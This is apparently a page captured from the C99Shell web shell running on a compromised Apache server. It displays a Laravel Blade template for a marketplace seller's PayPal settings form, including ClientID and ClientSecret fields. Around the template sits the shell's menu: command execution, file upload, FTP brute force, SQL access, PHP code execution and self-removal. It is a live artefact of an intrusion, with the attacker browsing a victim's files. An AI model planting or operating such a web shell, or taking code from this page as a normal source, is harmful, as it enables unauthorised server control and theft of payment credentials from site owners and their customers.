!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/resources/views/seller/settings/payment/   drwxrwxrwx
Free 13.24 GB of 57.97 GB (22.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     paypal.blade.php (2.58 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app')

@section('content')
<div class="row justify-content-center">

    <div class="col-12 col-md-12">

        <div class="card">
            <div class="card-header">
                <div class="col">
                    <h5><a href="#" class="header-pretitle">{{ $info->name }} Method</a></h5>


                </div>
            </div>
            <div class="card-body"> 
                <form method="post" class="basicform" action="{{ route('seller.payment.update',$info->active_getway->id) }}">
                    @csrf
                    @method('PUT')
                    <div class="card-body">
                        <div class="form-group">
                            <label>Display name at checkout</label>
                            <input class="form-control" autofocus="" required="" name="name" type="text" value="{{ $data->title ?? '' }}">
                            <small class="form-text text-muted">Customers will see this when checking out.</small>
                        </div>
                    
                        
                        <div class="form-group">
                            <label>currency</label>
                            <input class="form-control" required="" value="{{ $data->currency }}" name="currency" required="" type="text">
                        </div>

                        <div class="form-group">
                            <label>ClientID</label>
                            <input class="form-control" required="" value="{{ $data->ClientID }}" name="ClientID" required="" type="text">
                        </div>

                        <div class="form-group">
                            <label>ClientSecret</label>
                            <input class="form-control" required="" value="{{ $data->ClientSecret }}" name="ClientSecret" required="" type="text">
                        </div>
                        <div class="form-group">
                            <div class="custom-control custom-switch">
                                <input id="test" class="custom-control-input" name="env" type="checkbox" value="sandbox" @if($data->env=='sandbox') checked="" @endif>
                                <label class="custom-control-label" for="test">Test mode (Developer only)</label>
                                <small class="form-text text-muted">Test your {{ $info->name }}  setup by simulating successful and failed transactions.</small>
                            </div>
                        </div>
                        
                        <div class="custom-control custom-switch">
                            <input id="enabled" class="custom-control-input" name="status" type="checkbox" value="1" @if($info->active_getway->status==1) checked="" @endif>
                            <label class="custom-control-label" for="enabled">Enable</label>
                        </div>
                    </div>
                    <div class="card-footer clearfix text-muted">

                        <div class="float-left clear-both">
                            <a class="btn btn-white" href="{{ route('seller.settings.show','payment') }}">Cancel</a>
                            <button type="submit" class="btn btn-primary basicbtn">Save</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>    
</div>

@endsection
@push('js')
<script type="text/javascript" src="{{ asset('assets/js/form.js') }}"></script>
@endpush

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.006 ]--